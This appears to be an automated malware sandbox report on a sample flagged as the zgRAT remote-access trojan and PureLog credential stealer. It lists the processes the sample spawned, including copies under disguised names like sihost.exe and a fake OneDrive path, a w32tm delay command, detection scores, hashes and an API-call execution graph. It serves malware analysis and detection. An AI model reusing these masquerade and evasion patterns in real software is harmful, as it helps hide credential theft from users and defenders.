                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          • Detection: 60%, Virustotal, Browse
                                                          Has exited:true

                                                          General

                                                          Target ID:75
                                                          Start time:20:22:29
                                                          Start date:30/12/2024
                                                          Path:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Imagebase:0xf10000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:76
                                                          Start time:20:22:30
                                                          Start date:30/12/2024
                                                          Path:C:\Users\Default\Documents\sihost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\sihost.exe"
                                                          Imagebase:0xbd0000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          • Detection: 60%, Virustotal, Browse
                                                          Has exited:true

                                                          General

                                                          Target ID:77
                                                          Start time:20:22:30
                                                          Start date:30/12/2024
                                                          Path:C:\Users\Default\Documents\sihost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\sihost.exe"
                                                          Imagebase:0x7a0000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:78
                                                          Start time:20:22:31
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff61afd0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:79
                                                          Start time:20:22:35
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7e9310000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:81
                                                          Start time:20:22:43
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                                                          Imagebase:0xa70000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:82
                                                          Start time:20:22:48
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff693ab0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:10.2%
                                                            Total number of Nodes:1526
                                                            Total number of Limit Nodes:28
                                                            execution_graph 25356 20f421 21 API calls __vswprintf_c_l 25392 20b4ae 27 API calls _ValidateLocalCookies 25434 1e1710 86 API calls 25393 1fad10 73 API calls 23403 20bb30 23404 20bb39 23403->23404 23405 20bb42 23403->23405 23407 20ba27 23404->23407 23427 2097e5 GetLastError 23407->23427 23409 20ba34 23447 20bb4e 23409->23447 23411 20ba3c 23456 20b7bb 23411->23456 23414 20ba53 23414->23405 23420 20ba91 23480 2091a8 20 API calls _abort 23420->23480 23422 20bada 23423 20ba96 23422->23423 23487 20b691 26 API calls 23422->23487 23481 208dcc 23423->23481 23424 20baae 23424->23422 23425 208dcc _free 20 API calls 23424->23425 23425->23422 23428 2097fb 23427->23428 23431 209801 23427->23431 23488 20ae5b 11 API calls 2 library calls 23428->23488 23433 209850 SetLastError 23431->23433 23489 20b136 23431->23489 23433->23409 23434 20981b 23436 208dcc _free 20 API calls 23434->23436 23438 209821 23436->23438 23437 209830 23437->23434 23439 209837 23437->23439 23441 20985c SetLastError 23438->23441 23497 209649 20 API calls _abort 23439->23497 23498 208d24 38 API calls _abort 23441->23498 23442 209842 23444 208dcc _free 20 API calls 23442->23444 23446 209849 23444->23446 23446->23433 23446->23441 23448 20bb5a __FrameHandler3::FrameUnwindToState 23447->23448 23449 2097e5 _unexpected 38 API calls 23448->23449 23454 20bb64 23449->23454 23451 20bbe8 _abort 23451->23411 23454->23451 23455 208dcc _free 20 API calls 23454->23455 23501 208d24 38 API calls _abort 23454->23501 23502 20ac31 EnterCriticalSection 23454->23502 23503 20bbdf LeaveCriticalSection _abort 23454->23503 23455->23454 23504 204636 23456->23504 23459 20b7dc GetOEMCP 23461 20b805 23459->23461 23460 20b7ee 23460->23461 23462 20b7f3 GetACP 23460->23462 23461->23414 23463 208e06 23461->23463 23462->23461 23464 208e44 23463->23464 23469 208e14 _abort 23463->23469 23515 2091a8 20 API calls _abort 23464->23515 23465 208e2f RtlAllocateHeap 23467 208e42 23465->23467 23465->23469 23467->23423 23470 20bbf0 23467->23470 23469->23464 23469->23465 23514 207a5e 7 API calls 2 library calls 23469->23514 23471 20b7bb 40 API calls 23470->23471 23472 20bc0f 23471->23472 23475 20bc60 IsValidCodePage 23472->23475 23477 20bc16 23472->23477 23479 20bc85 _abort 23472->23479 23474 20ba89 23474->23420 23474->23424 23476 20bc72 GetCPInfo 23475->23476 23475->23477 23476->23477 23476->23479 23526 1ffbbc 23477->23526 23516 20b893 GetCPInfo 23479->23516 23480->23423 23482 208e00 __dosmaperr 23481->23482 23483 208dd7 RtlFreeHeap 23481->23483 23482->23414 23483->23482 23484 208dec 23483->23484 23607 2091a8 20 API calls _abort 23484->23607 23486 208df2 GetLastError 23486->23482 23487->23423 23488->23431 23494 20b143 _abort 23489->23494 23490 20b183 23500 2091a8 20 API calls _abort 23490->23500 23491 20b16e RtlAllocateHeap 23492 209813 23491->23492 23491->23494 23492->23434 23496 20aeb1 11 API calls 2 library calls 23492->23496 23494->23490 23494->23491 23499 207a5e 7 API calls 2 library calls 23494->23499 23496->23437 23497->23442 23499->23494 23500->23492 23502->23454 23503->23454 23505 204653 23504->23505 23511 204649 23504->23511 23506 2097e5 _unexpected 38 API calls 23505->23506 23505->23511 23507 204674 23506->23507 23512 20993a 38 API calls __fassign 23507->23512 23509 20468d 23513 209967 38 API calls __fassign 23509->23513 23511->23459 23511->23460 23512->23509 23513->23511 23514->23469 23515->23467 23517 20b977 23516->23517 23522 20b8cd 23516->23522 23519 1ffbbc _ValidateLocalCookies 5 API calls 23517->23519 23521 20ba23 23519->23521 23521->23477 23533 20c988 23522->23533 23525 20ab78 __vswprintf_c_l 43 API calls 23525->23517 23527 1ffbc5 IsProcessorFeaturePresent 23526->23527 23528 1ffbc4 23526->23528 23530 1ffc07 23527->23530 23528->23474 23606 1ffbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23530->23606 23532 1ffcea 23532->23474 23534 204636 __fassign 38 API calls 23533->23534 23535 20c9a8 MultiByteToWideChar 23534->23535 23537 20c9e6 23535->23537 23545 20ca7e 23535->23545 23539 208e06 __vswprintf_c_l 21 API calls 23537->23539 23542 20ca07 _abort __vsnwprintf_l 23537->23542 23538 1ffbbc _ValidateLocalCookies 5 API calls 23540 20b92e 23538->23540 23539->23542 23547 20ab78 23540->23547 23541 20ca78 23552 20abc3 20 API calls _free 23541->23552 23542->23541 23544 20ca4c MultiByteToWideChar 23542->23544 23544->23541 23546 20ca68 GetStringTypeW 23544->23546 23545->23538 23546->23541 23548 204636 __fassign 38 API calls 23547->23548 23549 20ab8b 23548->23549 23553 20a95b 23549->23553 23552->23545 23554 20a976 __vswprintf_c_l 23553->23554 23555 20a99c MultiByteToWideChar 23554->23555 23556 20ab50 23555->23556 23557 20a9c6 23555->23557 23558 1ffbbc _ValidateLocalCookies 5 API calls 23556->23558 23562 208e06 __vswprintf_c_l 21 API calls 23557->23562 23564 20a9e7 __vsnwprintf_l 23557->23564 23559 20ab63 23558->23559 23559->23525 23560 20aa30 MultiByteToWideChar 23561 20aa9c 23560->23561 23563 20aa49 23560->23563 23589 20abc3 20 API calls _free 23561->23589 23562->23564 23580 20af6c 23563->23580 23564->23560 23564->23561 23568 20aa73 23568->23561 23572 20af6c __vswprintf_c_l 11 API calls 23568->23572 23569 20aaab 23570 208e06 __vswprintf_c_l 21 API calls 23569->23570 23574 20aacc __vsnwprintf_l 23569->23574 23570->23574 23571 20ab41 23588 20abc3 20 API calls _free 23571->23588 23572->23561 23574->23571 23575 20af6c __vswprintf_c_l 11 API calls 23574->23575 23576 20ab20 23575->23576 23576->23571 23577 20ab2f WideCharToMultiByte 23576->23577 23577->23571 23578 20ab6f 23577->23578 23590 20abc3 20 API calls _free 23578->23590 23591 20ac98 23580->23591 23584 20afdc LCMapStringW 23585 20af9c 23584->23585 23586 1ffbbc _ValidateLocalCookies 5 API calls 23585->23586 23587 20aa60 23586->23587 23587->23561 23587->23568 23587->23569 23588->23561 23589->23556 23590->23561 23592 20acc8 23591->23592 23594 20acc4 23591->23594 23592->23585 23598 20aff4 10 API calls 3 library calls 23592->23598 23594->23592 23597 20ace8 23594->23597 23599 20ad34 23594->23599 23595 20acf4 GetProcAddress 23596 20ad04 _abort 23595->23596 23596->23592 23597->23592 23597->23595 23598->23584 23600 20ad55 LoadLibraryExW 23599->23600 23604 20ad4a 23599->23604 23601 20ad72 GetLastError 23600->23601 23602 20ad8a 23600->23602 23601->23602 23605 20ad7d LoadLibraryExW 23601->23605 23603 20ada1 FreeLibrary 23602->23603 23602->23604 23603->23604 23604->23594 23605->23602 23606->23532 23607->23486 25358 20c030 GetProcessHeap 25359 1fa400 GdipDisposeImage GdipFree 25417 1fd600 70 API calls 25360 206000 QueryPerformanceFrequency QueryPerformanceCounter 25395 202900 6 API calls 4 library calls 25418 20f200 51 API calls 25435 20a700 21 API calls 25398 1ff530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25437 1fff30 LocalFree 25365 1e1025 29 API calls 25419 1fc220 93 API calls _swprintf 24306 1fcd58 24308 1fce22 24306->24308 24312 1fcd7b _wcschr 24306->24312 24322 1fc793 _wcslen _wcsrchr 24308->24322 24334 1fd78f 24308->24334 24310 1fd40a 24311 1f1fbb CompareStringW 24311->24312 24312->24308 24312->24311 24314 1fca67 SetWindowTextW 24314->24322 24319 1fc855 SetFileAttributesW 24321 1fc90f GetFileAttributesW 24319->24321 24332 1fc86f _abort _wcslen 24319->24332 24321->24322 24324 1fc921 DeleteFileW 24321->24324 24322->24310 24322->24314 24322->24319 24325 1fcc31 GetDlgItem SetWindowTextW SendMessageW 24322->24325 24328 1fcc71 SendMessageW 24322->24328 24333 1f1fbb CompareStringW 24322->24333 24358 1fb314 24322->24358 24362 1fa64d GetCurrentDirectoryW 24322->24362 24364 1ea5d1 6 API calls 24322->24364 24365 1ea55a FindClose 24322->24365 24366 1fb48e 76 API calls 2 library calls 24322->24366 24367 203e3e 24322->24367 24324->24322 24326 1fc932 24324->24326 24325->24322 24327 1e4092 _swprintf 51 API calls 24326->24327 24329 1fc952 GetFileAttributesW 24327->24329 24328->24322 24329->24326 24330 1fc967 MoveFileW 24329->24330 24330->24322 24331 1fc97f MoveFileExW 24330->24331 24331->24322 24332->24321 24332->24322 24363 1eb991 51 API calls 3 library calls 24332->24363 24333->24322 24335 1fd799 _abort _wcslen 24334->24335 24336 1fd8a5 24335->24336 24339 1fd9c0 24335->24339 24340 1fd9e7 24335->24340 24383 1f1fbb CompareStringW 24335->24383 24380 1ea231 24336->24380 24339->24340 24342 1fd9de ShowWindow 24339->24342 24340->24322 24342->24340 24343 1fd8d9 ShellExecuteExW 24343->24340 24348 1fd8ec 24343->24348 24345 1fd8d1 24345->24343 24346 1fd925 24385 1fdc3b 6 API calls 24346->24385 24347 1fd97b CloseHandle 24349 1fd989 24347->24349 24350 1fd994 24347->24350 24348->24346 24348->24347 24351 1fd91b ShowWindow 24348->24351 24386 1f1fbb CompareStringW 24349->24386 24350->24339 24351->24346 24354 1fd93d 24354->24347 24355 1fd950 GetExitCodeProcess 24354->24355 24355->24347 24356 1fd963 24355->24356 24356->24347 24359 1fb31e 24358->24359 24360 1fb40d 24359->24360 24361 1fb3f0 ExpandEnvironmentStringsW 24359->24361 24360->24322 24361->24360 24362->24322 24363->24332 24364->24322 24365->24322 24366->24322 24368 208e54 24367->24368 24369 208e61 24368->24369 24370 208e6c 24368->24370 24371 208e06 __vswprintf_c_l 21 API calls 24369->24371 24372 208e74 24370->24372 24379 208e7d _abort 24370->24379 24377 208e69 24371->24377 24373 208dcc _free 20 API calls 24372->24373 24373->24377 24374 208e82 24395 2091a8 20 API calls _abort 24374->24395 24375 208ea7 RtlReAllocateHeap 24375->24377 24375->24379 24377->24322 24379->24374 24379->24375 24396 207a5e 7 API calls 2 library calls 24379->24396 24387 1ea243 24380->24387 24383->24336 24384 1eb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24384->24345 24385->24354 24386->24350 24388 1fec50 24387->24388 24389 1ea250 GetFileAttributesW 24388->24389 24390 1ea23a 24389->24390 24391 1ea261 24389->24391 24390->24343 24390->24384 24392 1ebb03 GetCurrentDirectoryW 24391->24392 24393 1ea275 24392->24393 24393->24390 24394 1ea279 GetFileAttributesW 24393->24394 24394->24390 24395->24377 24396->24379 25421 208268 55 API calls _free 25366 1fe455 14 API calls ___delayLoadHelper2@8 25438 207f6e 52 API calls 3 library calls 25368 1fa440 GdipCloneImage GdipAlloc 25422 203a40 5 API calls _ValidateLocalCookies 25439 211f40 CloseHandle 24479 1e9f7a 24480 1e9f8f 24479->24480 24481 1e9f88 24479->24481 24482 1e9f9c GetStdHandle 24480->24482 24489 1e9fab 24480->24489 24482->24489 24483 1ea003 WriteFile 24483->24489 24484 1e9fcf 24485 1e9fd4 WriteFile 24484->24485 24484->24489 24485->24484 24485->24489 24487 1ea095 24491 1e6e98 77 API calls 24487->24491 24489->24481 24489->24483 24489->24484 24489->24485 24489->24487 24490 1e6baa 78 API calls 24489->24490 24490->24489 24491->24481 24493 1e9a74 24494 1e9a7e 24493->24494 24495 1e9b9d SetFilePointer 24494->24495 24498 1e9b79 24494->24498 24499 1e9ab1 24494->24499 24500 1e981a 24494->24500 24496 1e9bb6 GetLastError 24495->24496 24495->24499 24496->24499 24498->24495 24501 1e9833 24500->24501 24503 1e9e80 79 API calls 24501->24503 24502 1e9865 24502->24498 24503->24502 25370 1e1075 84 API calls 25441 1e1f72 128 API calls __EH_prolog 25371 1fa070 10 API calls 25423 1fb270 99 API calls 25373 1fc793 107 API calls 5 library calls 25376 20a4a0 71 API calls _free 25377 2108a0 IsProcessorFeaturePresent 25405 1fb18d 78 API calls 25379 1fc793 97 API calls 4 library calls 25424 1fc793 102 API calls 5 library calls 25406 1f9580 6 API calls 25445 1f1bbd GetCPInfo IsDBCSLeadByte 23620 1ff3b2 23621 1ff3be __FrameHandler3::FrameUnwindToState 23620->23621 23652 1feed7 23621->23652 23623 1ff518 23725 1ff838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23623->23725 23624 1ff3c5 23624->23623 23628 1ff3ef 23624->23628 23626 1ff51f 23718 207f58 23626->23718 23637 1ff42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23628->23637 23663 208aed 23628->23663 23634 1ff40e 23636 1ff48f 23671 1ff953 GetStartupInfoW _abort 23636->23671 23637->23636 23721 207af4 38 API calls 2 library calls 23637->23721 23639 1ff495 23672 208a3e 51 API calls 23639->23672 23641 1ff49d 23673 1fdf1e 23641->23673 23646 1ff4b1 23646->23626 23647 1ff4b5 23646->23647 23648 1ff4be 23647->23648 23723 207efb 28 API calls _abort 23647->23723 23724 1ff048 12 API calls ___scrt_uninitialize_crt 23648->23724 23651 1ff4c6 23651->23634 23653 1feee0 23652->23653 23727 1ff654 IsProcessorFeaturePresent 23653->23727 23655 1feeec 23728 202a5e 23655->23728 23657 1feef1 23662 1feef5 23657->23662 23736 208977 23657->23736 23660 1fef0c 23660->23624 23662->23624 23666 208b04 23663->23666 23664 1ffbbc _ValidateLocalCookies 5 API calls 23665 1ff408 23664->23665 23665->23634 23667 208a91 23665->23667 23666->23664 23668 208ac0 23667->23668 23669 1ffbbc _ValidateLocalCookies 5 API calls 23668->23669 23670 208ae9 23669->23670 23670->23637 23671->23639 23672->23641 23836 1f0863 23673->23836 23677 1fdf3d 23885 1fac16 23677->23885 23679 1fdf46 _abort 23680 1fdf59 GetCommandLineW 23679->23680 23681 1fdf68 23680->23681 23682 1fdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23680->23682 23889 1fc5c4 23681->23889 23900 1e4092 23682->23900 23688 1fdf76 OpenFileMappingW 23692 1fdf8f MapViewOfFile 23688->23692 23693 1fdfd6 CloseHandle 23688->23693 23689 1fdfe0 23894 1fdbde 23689->23894 23695 1fdfcd UnmapViewOfFile 23692->23695 23696 1fdfa0 __InternalCxxFrameHandler 23692->23696 23693->23682 23695->23693 23700 1fdbde 2 API calls 23696->23700 23702 1fdfbc 23700->23702 23701 1f90b7 8 API calls 23703 1fe0aa DialogBoxParamW 23701->23703 23702->23695 23704 1fe0e4 23703->23704 23705 1fe0fd 23704->23705 23706 1fe0f6 Sleep 23704->23706 23708 1fe10b 23705->23708 23933 1fae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23705->23933 23706->23705 23709 1fe12a DeleteObject 23708->23709 23710 1fe13f DeleteObject 23709->23710 23711 1fe146 23709->23711 23710->23711 23712 1fe189 23711->23712 23713 1fe177 23711->23713 23930 1fac7c 23712->23930 23934 1fdc3b 6 API calls 23713->23934 23716 1fe17d CloseHandle 23716->23712 23717 1fe1c3 23722 1ff993 GetModuleHandleW 23717->23722 24185 207cd5 23718->24185 23721->23636 23722->23646 23723->23648 23724->23651 23725->23626 23727->23655 23740 203b07 23728->23740 23732 202a6f 23733 202a7a 23732->23733 23754 203b43 DeleteCriticalSection 23732->23754 23733->23657 23735 202a67 23735->23657 23783 20c05a 23736->23783 23739 202a7d 7 API calls 2 library calls 23739->23662 23741 203b10 23740->23741 23743 203b39 23741->23743 23744 202a63 23741->23744 23755 203d46 23741->23755 23760 203b43 DeleteCriticalSection 23743->23760 23744->23735 23746 202b8c 23744->23746 23776 203c57 23746->23776 23749 202ba1 23749->23732 23751 202baf 23752 202bbc 23751->23752 23782 202bbf 6 API calls ___vcrt_FlsFree 23751->23782 23752->23732 23754->23735 23761 203c0d 23755->23761 23758 203d7e InitializeCriticalSectionAndSpinCount 23759 203d69 23758->23759 23759->23741 23760->23744 23762 203c26 23761->23762 23766 203c4f 23761->23766 23762->23766 23768 203b72 23762->23768 23765 203c3b GetProcAddress 23765->23766 23767 203c49 23765->23767 23766->23758 23766->23759 23767->23766 23774 203b7e ___vcrt_InitializeCriticalSectionEx 23768->23774 23769 203bf3 23769->23765 23769->23766 23770 203b95 LoadLibraryExW 23771 203bb3 GetLastError 23770->23771 23772 203bfa 23770->23772 23771->23774 23772->23769 23773 203c02 FreeLibrary 23772->23773 23773->23769 23774->23769 23774->23770 23775 203bd5 LoadLibraryExW 23774->23775 23775->23772 23775->23774 23777 203c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23776->23777 23778 203c71 23777->23778 23779 203c8a TlsAlloc 23778->23779 23780 202b96 23778->23780 23780->23749 23781 203d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23780->23781 23781->23751 23782->23749 23784 20c077 23783->23784 23787 20c073 23783->23787 23784->23787 23789 20a6a0 23784->23789 23785 1ffbbc _ValidateLocalCookies 5 API calls 23786 1feefe 23785->23786 23786->23660 23786->23739 23787->23785 23790 20a6ac __FrameHandler3::FrameUnwindToState 23789->23790 23801 20ac31 EnterCriticalSection 23790->23801 23792 20a6b3 23802 20c528 23792->23802 23794 20a6c2 23800 20a6d1 23794->23800 23815 20a529 29 API calls 23794->23815 23797 20a6cc 23816 20a5df GetStdHandle GetFileType 23797->23816 23798 20a6e2 _abort 23798->23784 23817 20a6ed LeaveCriticalSection _abort 23800->23817 23801->23792 23803 20c534 __FrameHandler3::FrameUnwindToState 23802->23803 23804 20c541 23803->23804 23805 20c558 23803->23805 23826 2091a8 20 API calls _abort 23804->23826 23818 20ac31 EnterCriticalSection 23805->23818 23808 20c546 23827 209087 26 API calls __cftof 23808->23827 23810 20c550 _abort 23810->23794 23811 20c590 23828 20c5b7 LeaveCriticalSection _abort 23811->23828 23813 20c564 23813->23811 23819 20c479 23813->23819 23815->23797 23816->23800 23817->23798 23818->23813 23820 20b136 _abort 20 API calls 23819->23820 23822 20c48b 23820->23822 23821 20c498 23823 208dcc _free 20 API calls 23821->23823 23822->23821 23829 20af0a 23822->23829 23825 20c4ea 23823->23825 23825->23813 23826->23808 23827->23810 23828->23810 23830 20ac98 _abort 5 API calls 23829->23830 23831 20af31 23830->23831 23832 20af4f InitializeCriticalSectionAndSpinCount 23831->23832 23833 20af3a 23831->23833 23832->23833 23834 1ffbbc _ValidateLocalCookies 5 API calls 23833->23834 23835 20af66 23834->23835 23835->23822 23935 1fec50 23836->23935 23839 1f0888 GetProcAddress 23842 1f08b9 GetProcAddress 23839->23842 23843 1f08a1 23839->23843 23840 1f08e7 23841 1f0c14 GetModuleFileNameW 23840->23841 23946 2075fb 42 API calls __vsnwprintf_l 23840->23946 23852 1f0c32 23841->23852 23845 1f08cb 23842->23845 23843->23842 23845->23840 23846 1f0b54 23846->23841 23847 1f0b5f GetModuleFileNameW CreateFileW 23846->23847 23848 1f0b8f SetFilePointer 23847->23848 23849 1f0c08 CloseHandle 23847->23849 23848->23849 23850 1f0b9d ReadFile 23848->23850 23849->23841 23850->23849 23853 1f0bbb 23850->23853 23855 1f0c94 GetFileAttributesW 23852->23855 23856 1f0cac 23852->23856 23858 1f0c5d CompareStringW 23852->23858 23937 1eb146 23852->23937 23940 1f081b 23852->23940 23853->23849 23857 1f081b 2 API calls 23853->23857 23855->23852 23855->23856 23859 1f0cb7 23856->23859 23861 1f0cec 23856->23861 23857->23853 23858->23852 23862 1f0cd0 GetFileAttributesW 23859->23862 23864 1f0ce8 23859->23864 23860 1f0dfb 23884 1fa64d GetCurrentDirectoryW 23860->23884 23861->23860 23863 1eb146 GetVersionExW 23861->23863 23862->23859 23862->23864 23865 1f0d06 23863->23865 23864->23861 23866 1f0d0d 23865->23866 23867 1f0d73 23865->23867 23869 1f081b 2 API calls 23866->23869 23868 1e4092 _swprintf 51 API calls 23867->23868 23870 1f0d9b AllocConsole 23868->23870 23871 1f0d17 23869->23871 23872 1f0da8 GetCurrentProcessId AttachConsole 23870->23872 23873 1f0df3 ExitProcess 23870->23873 23874 1f081b 2 API calls 23871->23874 23951 203e13 23872->23951 23876 1f0d21 23874->23876 23947 1ee617 23876->23947 23877 1f0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23877->23873 23880 1e4092 _swprintf 51 API calls 23881 1f0d4f 23880->23881 23882 1ee617 53 API calls 23881->23882 23883 1f0d5e 23882->23883 23883->23873 23884->23677 23886 1f081b 2 API calls 23885->23886 23887 1fac2a OleInitialize 23886->23887 23888 1fac4d GdiplusStartup SHGetMalloc 23887->23888 23888->23679 23892 1fc5ce 23889->23892 23890 1fc6e4 23890->23688 23890->23689 23891 1f1fac CharUpperW 23891->23892 23892->23890 23892->23891 23976 1ef3fa 82 API calls 2 library calls 23892->23976 23895 1fec50 23894->23895 23896 1fdbeb SetEnvironmentVariableW 23895->23896 23897 1fdc0e 23896->23897 23898 1fdc36 23897->23898 23899 1fdc2a SetEnvironmentVariableW 23897->23899 23898->23682 23899->23898 23977 1e4065 23900->23977 23903 1fb6dd LoadBitmapW 23904 1fb6fe 23903->23904 23905 1fb70b GetObjectW 23903->23905 24011 1fa6c2 FindResourceW 23904->24011 23907 1fb71a 23905->23907 24006 1fa5c6 23907->24006 23911 1fb770 23922 1eda42 23911->23922 23912 1fb74c 24027 1fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23912->24027 23913 1fa6c2 13 API calls 23915 1fb73d 23913->23915 23915->23912 23917 1fb743 DeleteObject 23915->23917 23916 1fb754 24028 1fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23916->24028 23917->23912 23919 1fb75d 24029 1fa80c 8 API calls 23919->24029 23921 1fb764 DeleteObject 23921->23911 24040 1eda67 23922->24040 23927 1f90b7 24173 1feb38 23927->24173 23931 1facab GdiplusShutdown CoUninitialize 23930->23931 23931->23717 23933->23708 23934->23716 23936 1f086d GetModuleHandleW 23935->23936 23936->23839 23936->23840 23938 1eb15a GetVersionExW 23937->23938 23939 1eb196 23937->23939 23938->23939 23939->23852 23941 1fec50 23940->23941 23942 1f0828 GetSystemDirectoryW 23941->23942 23943 1f085e 23942->23943 23944 1f0840 23942->23944 23943->23852 23945 1f0851 LoadLibraryW 23944->23945 23945->23943 23946->23846 23948 1ee627 23947->23948 23953 1ee648 23948->23953 23952 203e1b 23951->23952 23952->23877 23952->23952 23959 1ed9b0 23953->23959 23956 1ee66b LoadStringW 23957 1ee645 23956->23957 23958 1ee682 LoadStringW 23956->23958 23957->23880 23958->23957 23964 1ed8ec 23959->23964 23961 1ed9cd 23963 1ed9e2 23961->23963 23972 1ed9f0 26 API calls 23961->23972 23963->23956 23963->23957 23965 1ed904 23964->23965 23971 1ed984 _strncpy 23964->23971 23967 1ed928 23965->23967 23973 1f1da7 WideCharToMultiByte 23965->23973 23970 1ed959 23967->23970 23974 1ee5b1 50 API calls __vsnprintf 23967->23974 23975 206159 26 API calls 3 library calls 23970->23975 23971->23961 23972->23963 23973->23967 23974->23970 23975->23971 23976->23892 23978 1e407c __vsnwprintf_l 23977->23978 23981 205fd4 23978->23981 23984 204097 23981->23984 23985 2040d7 23984->23985 23986 2040bf 23984->23986 23985->23986 23987 2040df 23985->23987 24001 2091a8 20 API calls _abort 23986->24001 23989 204636 __fassign 38 API calls 23987->23989 23991 2040ef 23989->23991 23990 2040c4 24002 209087 26 API calls __cftof 23990->24002 24003 204601 20 API calls 2 library calls 23991->24003 23994 1ffbbc _ValidateLocalCookies 5 API calls 23996 1e4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23994->23996 23995 204167 24004 2049e6 51 API calls 4 library calls 23995->24004 23996->23903 23998 204172 24005 2046b9 20 API calls _free 23998->24005 24000 2040cf 24000->23994 24001->23990 24002->24000 24003->23995 24004->23998 24005->24000 24030 1fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24006->24030 24008 1fa5cd 24009 1fa5d9 24008->24009 24031 1fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24008->24031 24009->23911 24009->23912 24009->23913 24012 1fa7d3 24011->24012 24013 1fa6e5 SizeofResource 24011->24013 24012->23905 24012->23907 24013->24012 24014 1fa6fc LoadResource 24013->24014 24014->24012 24015 1fa711 LockResource 24014->24015 24015->24012 24016 1fa722 GlobalAlloc 24015->24016 24016->24012 24017 1fa73d GlobalLock 24016->24017 24018 1fa7cc GlobalFree 24017->24018 24019 1fa74c __InternalCxxFrameHandler 24017->24019 24018->24012 24020 1fa754 CreateStreamOnHGlobal 24019->24020 24021 1fa76c 24020->24021 24022 1fa7c5 GlobalUnlock 24020->24022 24032 1fa626 GdipAlloc 24021->24032 24022->24018 24025 1fa79a GdipCreateHBITMAPFromBitmap 24026 1fa7b0 24025->24026 24026->24022 24027->23916 24028->23919 24029->23921 24030->24008 24031->24009 24033 1fa638 24032->24033 24034 1fa645 24032->24034 24036 1fa3b9 24033->24036 24034->24022 24034->24025 24034->24026 24037 1fa3da GdipCreateBitmapFromStreamICM 24036->24037 24038 1fa3e1 